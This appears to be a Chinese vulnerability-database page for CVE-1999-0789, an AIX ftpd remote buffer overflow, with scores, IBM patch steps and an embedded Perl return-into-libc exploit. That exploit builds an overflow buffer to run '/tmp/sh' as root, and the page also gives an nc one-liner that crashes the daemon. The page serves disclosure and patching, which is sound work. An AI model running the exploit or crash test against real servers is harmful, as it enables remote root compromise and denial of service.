CVE-1999-0789
CVSS10.0
发布时间 :1999-09-28 00:00:00
修订时间 :2008-09-09 08:35:38
NMCOE    

[原文]Buffer overflow in AIX ftpd in the libc library.


[CNNVD]AIX ftpd远程缓冲区溢出漏洞(CNNVD-199909-053)

        
        AIX ftpd存在远程缓冲区溢出漏洞,远程攻击者可以获得root用户权限。
        可以使用如下的方法测试AIX ftpd是否存在漏洞:
        perl -e 'print "A" x 5000' | nc -v -v aix 21
        如果立刻返回(ftpd崩溃),说明服务存在漏洞。如果返回很多500 AAAAA... unknown command此类的错误,说明该服务不受影响。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1IBM AIX 4.3.1
cpe:/o:ibm:aix:4.3.2IBM AIX 4.3.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0789
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0789
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-053
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/679
(UNKNOWN)  BID  679
http://www.ciac.org/ciac/bulletins/j-072.shtml
(UNKNOWN)  CIAC  J-072

- 漏洞信息

AIX ftpd远程缓冲区溢出漏洞
危急 边界条件错误
1999-09-28 00:00:00 2005-05-02 00:00:00
远程  
        
        AIX ftpd存在远程缓冲区溢出漏洞,远程攻击者可以获得root用户权限。
        可以使用如下的方法测试AIX ftpd是否存在漏洞:
        perl -e 'print "A" x 5000' | nc -v -v aix 21
        如果立刻返回(ftpd崩溃),说明服务存在漏洞。如果返回很多500 AAAAA... unknown command此类的错误,说明该服务不受影响。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果你的AIX版本小于4.2.x则不受影响,否则暂时停止ftp服务。
        厂商补丁:
        IBM
        ---
        IBM已经为此发布了一个安全公告(ERS-SVA-E01-1999:004.1)以及相应补丁:
        ERS-SVA-E01-1999:004.1:Remote buffer overflow in ftpd daemon.
        补丁下载:
        ftp://aix.software.ibm.com/aix/efixes/security/ftpd.tar.Z
        ftpd 02584 147 4577818c9c95b47ffc915ab750f36bd3
        安装方法如下:
        1. 解压补丁程序.
        # uncompress < ftpd.tar.Z | tar xf -
        # cd ftpd
        2. 替换有漏洞的ftpd.
        # mv /usr/sbin/ftpd /usr/sbin/ftpd.before_security_fix
        # chown root.system /usr/sbin/ftpd.before_security_fix
        # chmod 0 /usr/sbin/ftpd.before_security_fix
        # cp ./ftpd /usr/sbin/ftpd
        # chown root.system /usr/sbin/ftpd
        # chmod 4554 /usr/sbin/ftpd

- 漏洞信息 (19532)

IBM AIX <= 4.3.2 ftpd Remote Buffer Overflow (EDBID:19532)
aix remote
1999-09-28 Verified
0 Gerrie
N/A [点击下载]
source: http://www.securityfocus.com/bid/679/info

A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access. 

#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is an return into libc exploit specificly crafted for
# one box and it is very unlikely to work on another box

# * Author:
#
# dvorak (dvorak@synnergy.net)
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek

# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
#      we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffera
#             loads r0 with the next address to jump to (0x1001038c)
#             and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
#             sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is  the plave where TOC is stored but it doesn't seem
#            to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf =  the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
#        0xd00406d4 in our case# 0x00c: thi is the address where r2 is
loaded
#        from just before the call to
#        system(..) we set it to the TOC in our program we don't know if it
#        matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
#     l   r2, 0x14(r1)
#     b   0x10015228
# 0x10015228:
#     l   r12, 0x110(r2)
#     st  r12, 0x14(r1)
#     l   r0, 0x0(r12)
#     l   r2, 0x4(r12)
#     b   r0
# 0x1001038c:
#     l   r3, 0x40(r1)
#     b   0x100136f8
# 0x100136f8:
#     l   r12, 0x3c(r2)
#     st  r12, 0x14(r1)
#     l   r0,  0x0(r12)
#     l   r2,  0x04(r12)

# *** Synnergy Networks

$bufstart = 0x2ff22724;         # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c";     # 0 address of second piece of
                                # 'borrowed' code
$buf .= pack ("N", $bufstart);  # 4
$buf .= "\xd0\x04\x06\xd4";     # 8 system call..
$buf .= "\xf0\x14\x63\x5c";     # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
    $offset += 4;
    $buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";

# offcourse you should change this .
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;

# EOF
		

- 漏洞信息

9
IBM AIX FTPD libc Library Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in IBM AIX. The libc library fails to perform proper bounds checking allowing an attacker to execute arbitrary commands via the FTPD daemon.

- 时间线

1999-09-28 Unknow
1999-09-28 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, IBM has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站